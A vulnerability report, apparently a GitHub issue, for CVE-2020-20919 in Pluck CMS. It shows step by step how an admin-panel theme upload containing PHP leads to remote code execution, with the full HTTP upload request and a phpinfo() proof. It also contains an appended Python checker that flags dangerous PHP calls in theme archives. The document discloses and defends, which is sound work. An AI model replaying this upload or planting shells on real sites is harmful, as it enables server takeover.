CVE-2020-20919: pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme · Issue #85 · pluck-cms/pluck
File upload vulnerability in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary code and access sensitive information via the theme.php file.
Demo:
After the installation is successful, go to the management background.
options->choose theme->install theme
vul-url:
http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall
According to the default template, the theme is faked with the content of the theme shell.php.zip as follows:
Insert phpinfo(); into the theme.php file.
Upload:
POST /pluck-4.7.10-dev3/admin.php?action=themeinstall HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall
Cookie: PHPSESSID=en364hjlvg84vpdvmv9gdlc0h2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------10771789627341
Content-Length: 2441

-----------------------------10771789627341
Content-Disposition: form-data; name="sendfile"; filename="shell.php.zip"
Content-Type: application/x-zip-compressed

[binary ZIP data omitted]
-----------------------------10771789627341
Content-Disposition: form-data; name="submit"

Upload
-----------------------------10771789627341--
1. Default theme
View site
2. Choose the shell.php theme
View site http://192.168.80.1/pluck-4.7.10-dev3/
The phpinfo(); function is executed.
The vulnerability exists in the latest pluck-4.7.10-dev2 and pluck-4.7.10-dev3. The pluck-4.7.10-dev4 version cannot be uploaded due to bugs in the program, but in theory the RCE vulnerability exists. In pluck-4.7.10-dev4 version
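
A defender-side check for the theme-install path reported above, added here as an example (it is not code from the issue or from Pluck): it audits a theme ZIP before installation and flags PHP files that call functions a presentation-only theme should not need. The call list, the size cap, the helper names and the sample archive are assumptions constructed for the example.

```python
import io
import re
import zipfile

# Assumed heuristic list: calls a presentation-only theme has no reason to make.
SUSPICIOUS_CALLS = ("phpinfo", "eval", "system", "exec", "shell_exec",
                    "passthru", "popen", "proc_open", "base64_decode")
CALL_RE = re.compile(r"\b(" + "|".join(SUSPICIOUS_CALLS) + r")\s*\(", re.I)
PHP_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
MAX_ENTRY_BYTES = 1_000_000  # assumed cap so a huge entry is flagged, not read


def audit_theme_zip(data: bytes) -> list[str]:
    """Return findings for a theme archive; an empty list means nothing flagged."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.startswith("/") or ".." in name.split("/"):
                findings.append(f"{name}: path escapes the theme directory")
            elif info.file_size > MAX_ENTRY_BYTES:
                findings.append(f"{name}: entry larger than {MAX_ENTRY_BYTES} bytes")
            elif not info.is_dir() and PHP_EXT_RE.search(name):
                body = zf.read(info).decode("utf-8", errors="replace")
                calls = sorted({m.group(1).lower() for m in CALL_RE.finditer(body)})
                findings += [f"{name}: calls {c}()" for c in calls]
    return findings


def build_sample(theme_php: str) -> bytes:
    """Constructed archive; theme.php is the file the issue modifies."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("shell.php/info.php", "<?php /* constructed metadata */ ?>")
        zf.writestr("shell.php/style.css", "body { margin: 0; }")
        zf.writestr("shell.php/theme.php", theme_php)
    return buf.getvalue()


BENIGN = "<html><body><?php echo $title; ?></body></html>"  # constructed
MODIFIED = BENIGN + "<?php phpinfo(); ?>"  # the change the issue describes

if __name__ == "__main__":
    for label, src in (("default-like", BENIGN), ("modified", MODIFIED)):
        print(label, audit_theme_zip(build_sample(src)))
```

Name matching like this is a triage aid and is easy to evade. Because an installed theme.php runs as PHP, theme installation has to stay limited to fully trusted administrators.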